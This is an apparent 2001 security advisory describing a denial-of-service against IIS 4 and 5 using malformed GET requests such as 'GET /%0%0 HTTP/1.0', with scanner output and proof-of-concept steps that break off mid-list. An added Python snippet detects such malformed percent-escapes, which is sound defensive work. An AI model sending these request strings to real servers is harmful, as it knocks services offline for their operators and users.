Title: DoSing IIS4 and fully patched IIS5 using GET command
Released by: SecurHack. Labs
Date: 13th January 2001
______________________________________________________________________
NtWaK0, SecurHack. Labs
Security Advisory 1-13-2001
DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0
______________________________________________________________________
oooooooooooooooooo
Vulnerable Systems
oooooooooooooooooo
IIS 4 and IIS 5 even if fully patched.
oooooooo
Synopsis
oooooooo
While playing with Miner in Retina I sent this GET /%0%0 HTTP/1.0 to one
of my IIS 4 and IIS 5 servers. I noticed that Retina is taking a lot of
time to jump to the next defined variable in the brain.ini, which should
be GET /%0%1 and so on.
Retina Result
ooooooooooooo
Command: GET /%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060
Command: GET /_vti_inf.html%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060
Command: GET /_vti_inf.html%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060
Pinging the box while running Retina, even from a different subnet, it
won't answer.
You can connect to the web but you have to wait forever for it to load.
I have tried that on IIS 4 and IIS 5 and same result ....
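
An added detection example, not part of the original advisory: the request targets shown above contain '%' characters that are not followed by two hex digits, so they are malformed percent-escapes. The Python below flags such targets in request lines captured in front of the server; the record format, function names, threshold and sample IPs are assumptions constructed for illustration.

```python
import re
from collections import Counter

# A '%' in a request target is only valid when followed by two hex digits (RFC 3986).
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")

def malformed_escapes(target):
    """Return the offset of every '%' that is not followed by two hex digits."""
    return [m.start() for m in BAD_ESCAPE.finditer(target)]

def scan(records, threshold=2):
    """records: iterable of (client_ip, raw_request_line) pairs (assumed format).
    Returns (hits, noisy): hits lists (ip, target, offsets) for malformed targets,
    noisy is the set of clients that sent at least `threshold` of them."""
    hits, per_client = [], Counter()
    for ip, line in records:
        m = REQUEST_LINE.match(line.strip())
        if not m:
            continue  # not a parseable request line; out of scope for this check
        offsets = malformed_escapes(m.group("target"))
        if offsets:
            hits.append((ip, m.group("target"), offsets))
            per_client[ip] += 1
    noisy = {ip for ip, n in per_client.items() if n >= threshold}
    return hits, noisy

# Constructed sample records (documentation-range IPs), not real traffic.
SAMPLE = [
    ("192.0.2.10", "GET /index.html HTTP/1.0"),
    ("192.0.2.10", "GET /docs/a%20b.html HTTP/1.0"),      # valid escape, not flagged
    ("198.51.100.7", "GET /%0%0 HTTP/1.0"),               # pattern from the advisory
    ("198.51.100.7", "GET /_vti_inf.html%0%0 HTTP/1.0"),  # pattern from the advisory
    ("203.0.113.5", "GET /report%2 HTTP/1.0"),            # truncated escape
]

if __name__ == "__main__":
    hits, noisy = scan(SAMPLE)
    for ip, target, offsets in hits:
        print(f"{ip} malformed escape at offsets {offsets} in {target!r}")
    print("clients at or over threshold:", sorted(noisy))
```

The same regular expression can back a reject rule in a filtering proxy, since a conforming client never emits a bare '%' in a request target.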
oooooooooooooooo
Proof-Of-Concept
oooooooooooooooo
1- Get Retina From eeye.com
2- Install it
3- Edit the file Brain.ini located
C:\Program Files\Retina 2.0\Modules\Retina\Miner\brain.ini